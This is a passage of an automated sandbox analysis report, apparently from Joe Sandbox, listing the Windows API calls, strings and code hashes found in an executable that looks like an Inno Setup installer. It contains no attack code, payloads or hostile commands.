                                                                                                    • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                                    • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                                                    • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                                    • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                                                    APIs
                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                    • String ID: .tmp
                                                                                                    • API String ID: 1375471231-2986845003
                                                                                                    • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                    • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                                                                    • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                    • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                                                    APIs
                                                                                                      • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                                      • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                      • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                      • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                      • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                      • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                      • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                      • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                      • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                                      • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                                      • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                      • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                                    • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                                    • API String ID: 3869789854-2936008475
                                                                                                    • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                    • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                                                                    • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                    • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                                                                    APIs
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close
                                                                                                    • String ID: RegisteredOrganization$RegisteredOwner
                                                                                                    • API String ID: 3535843008-1113070880
                                                                                                    • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                                    • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                                                                    • Opcode Fuzzy Hash: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                                    • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                                                      • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateErrorFileHandleLast
                                                                                                    • String ID: CreateFile
                                                                                                    • API String ID: 2528220319-823142352
                                                                                                    • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                                    • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                                                                    • Opcode Fuzzy Hash: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                                    • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                                    • API String ID: 71445658-2565060666
                                                                                                    • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                                    • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                                                    • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                                    • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                                                    APIs
                                                                                                      • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                                                      • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                      • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                                    • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                                    • API String ID: 2906209438-2320870614
                                                                                                    • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                                    • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                                                                    • Opcode Fuzzy Hash: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                                    • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                      • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressErrorLibraryLoadModeProc
                                                                                                    • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                    • API String ID: 2492108670-2683653824
                                                                                                    • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                    • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                                                                    • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                    • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                                                                    APIs
                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2574300362-0
                                                                                                    • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                                    • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                                                    • Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                                    • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                                                                    APIs
                                                                                                    • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                                                                    • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                                                                    • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Append$System
                                                                                                    • String ID:
                                                                                                    • API String ID: 1489644407-0
                                                                                                    • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                                    • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
                                                                                                    • Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                                    • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
                                                                                                    APIs
                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                                                                    • TranslateMessage.USER32(?), ref: 0042448F
                                                                                                    • DispatchMessageA.USER32(?), ref: 00424499
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$DispatchPeekTranslate
                                                                                                    • String ID:
                                                                                                    • API String ID: 4217535847-0
                                                                                                    • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                                    • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                                                                    • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                                    • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                                                                    APIs
                                                                                                    • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                                                                    • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Prop$Window
                                                                                                    • String ID:
                                                                                                    • API String ID: 3363284559-0
                                                                                                    • Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                                    • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                                                                    • Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                                    • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                                                                    APIs
                                                                                                    • IsWindowVisible.USER32(?), ref: 0041EE64
                                                                                                    • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                                                                    • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnableEnabledVisible
                                                                                                    • String ID:
                                                                                                    • API String ID: 3234591441-0
                                                                                                    • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                                    • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                                                                    • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                                    • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                                                                    APIs
                                                                                                    • SetActiveWindow.USER32(?), ref: 0046A02D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ActiveWindow
                                                                                                    • String ID: PrepareToInstall
                                                                                                    • API String ID: 2558294473-1101760603
                                                                                                    • Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                    • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                                                                    • Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                    • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: /:*?"<>|
                                                                                                    • API String ID: 0-4078764451
                                                                                                    APIs
                                                                                                    • SetActiveWindow.USER32(?), ref: 00482676
                                                                                                    Similarity
                                                                                                    • API ID: ActiveWindow
                                                                                                    • String ID: InitializeWizard
                                                                                                    • API String ID: 2558294473-2356795471
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                                    • API String ID: 47109696-1019749484
                                                                                                    APIs
                                                                                                    • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                                    Strings
                                                                                                    • Inno Setup: Setup Version, xrefs: 0046EE65
                                                                                                    Similarity
                                                                                                    • API ID: Value
                                                                                                    • String ID: Inno Setup: Setup Version
                                                                                                    • API String ID: 3702945584-4166306022
                                                                                                    APIs
                                                                                                    • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                                    Similarity
                                                                                                    • API ID: Value
                                                                                                    • String ID: NoModify
                                                                                                    • API String ID: 3702945584-1699962838
                                                                                                    APIs
                                                                                                    • GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
                                                                                                      • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                                                      • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                                                      • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                                                                    • SendNotifyMessageA.USER32(000103F2,00000496,00002711,-00000001), ref: 0047E6BA
                                                                                                    Similarity
                                                                                                    • API ID: EnumFontsMessageNotifyReleaseSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 2649214853-0
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                                                      • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMetricsMultiSystemWide
                                                                                                    • String ID: /G
                                                                                                    • API String ID: 224039744-2088674125
                                                                                                    APIs
                                                                                                    • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
